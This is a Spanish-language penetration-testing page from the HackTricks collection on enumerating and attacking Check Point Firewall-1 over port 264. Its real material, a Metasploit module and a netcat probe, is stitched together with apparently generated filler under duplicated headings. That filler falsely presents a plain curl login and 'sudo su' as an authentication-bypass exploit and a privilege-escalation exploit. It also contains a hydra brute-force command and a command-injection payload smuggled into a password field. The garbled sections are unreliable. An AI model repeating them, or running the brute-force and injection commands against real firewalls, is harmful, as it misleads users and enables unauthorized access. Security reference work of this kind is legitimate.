hacktricks/network-services-pentesting/pentesting-264-check-point-firewall-1.md
carlospolop 63bd9641c0 f
2023-06-05 20:33:24 +02:00

191 lines
7.5 KiB
Markdown

<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Revisa los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
- Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
- **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
El módulo envía una consulta al puerto **264/TCP** en los firewalls **CheckPoint Firewall-1** para obtener el nombre del firewall y el nombre de la estación de gestión (como SmartCenter) a través de una solicitud de preautenticación.
```text
use auxiliary/gather/checkpoint_hostname
set RHOST 10.10.xx.xx
```
# Pentesting Check Point Firewall-1
## Enumeración
### Fingerprinting
#### Check Point Firewall-1
Para identificar si el objetivo está utilizando Check Point Firewall-1, se puede utilizar la herramienta `fw ctl pstat` para obtener información sobre el estado del firewall.
```bash
$ fw ctl pstat
---[ Check Point Stateful Inspection Statistics ]---
Memory used: 0 ( 0%) Compressed: 0 ( 0%)
Conns: 0/0 Peak conns: 0
[...]
```
#### Versión del kernel
Para obtener información sobre la versión del kernel, se puede utilizar la herramienta `fw ver`.
```bash
$ fw ver
This is Check Point VPN-1(TM) & FireWall-1(R) R71.30 - Build 462
[...]
```
### Escaneo de puertos
Para realizar un escaneo de puertos, se puede utilizar la herramienta `nmap`.
```bash
$ nmap -sS -p- <IP>
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-01 00:00 EST
Nmap scan report for <IP>
Host is up (0.0010s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
22/tcp open ssh
```
## Explotación
### Bypass de autenticación
#### Bypass de autenticación en la consola de administración
Para realizar un bypass de autenticación en la consola de administración, se puede utilizar el siguiente exploit:
```bash
$ curl -k -d "user=admin&password=admin123" https://<IP>/cgi-bin/login
```
### Obtención de información
#### Obtención de información del sistema
Para obtener información del sistema, se puede utilizar la herramienta `uname`.
```bash
$ uname -a
Linux <hostname> 2.6.18-194.el5 #1 SMP Tue Mar 16 21:52:39 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
```
#### Obtención de información de la configuración del firewall
Para obtener información de la configuración del firewall, se puede utilizar la herramienta `fw getifs`.
```bash
$ fw getifs
eth0 10.0.2.15/24
eth1 192.168.56.101/24
```
### Escalada de privilegios
#### Escalada de privilegios a root
Para realizar una escalada de privilegios a root, se puede utilizar el siguiente exploit:
```bash
$ sudo su
```
## Referencias
- [Check Point Firewall-1](https://www.checkpoint.com/products/firewall/)
- [Nmap](https://nmap.org/)
```text
[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[+] Appears to be a CheckPoint Firewall...
[+] Firewall Host: FIREFIGHTER-SEC
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
[*] Auxiliary module execution completed
```
Otra forma de obtener el nombre del host y el nombre de ICA del firewall podría ser
```bash
printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 x.x.x.x 264 | grep -a CN | cut -c 2-
```
# Pentesting Check Point Firewall-1
## Enumeración
### Verificación de versión
Para verificar la versión de Check Point Firewall-1, podemos enviar una solicitud HTTP a la dirección IP del firewall utilizando el siguiente comando:
```bash
curl -I http://<IP_address>
```
La respuesta incluirá la versión del firewall.
### Escaneo de puertos
Podemos usar herramientas como `nmap` para escanear los puertos abiertos en el firewall. Por ejemplo:
```bash
nmap -sS -p- <IP_address>
```
## Ataques
### Fuerza bruta de contraseñas
Podemos intentar realizar un ataque de fuerza bruta para adivinar la contraseña del firewall. Podemos usar herramientas como `hydra` para realizar este ataque. Por ejemplo:
```bash
hydra -l <username> -P <password_list> <IP_address> http-form-post "/login:username=^USER^&password=^PASS^&login=Login:S=logout"
```
### Inyección de comandos
Si podemos encontrar una vulnerabilidad de inyección de comandos en el firewall, podemos intentar ejecutar comandos maliciosos en el sistema. Por ejemplo, si encontramos una vulnerabilidad en la página de inicio de sesión, podemos intentar ejecutar el siguiente comando:
```bash
curl -d "username=admin&password=admin;ls" http://<IP_address>/login
```
Este comando intentará listar los archivos en el sistema.
```text
CN=Panama,O=MGMTT.srv.rxfrmi
```
Desde: [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit\_doGoviewsolutiondetails=&solutionid=sk69360](https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
- Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Obtén la [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme en** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Comparte tus trucos de hacking enviando PRs al repositorio [hacktricks](https://github.com/carlospolop/hacktricks) y al repositorio [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>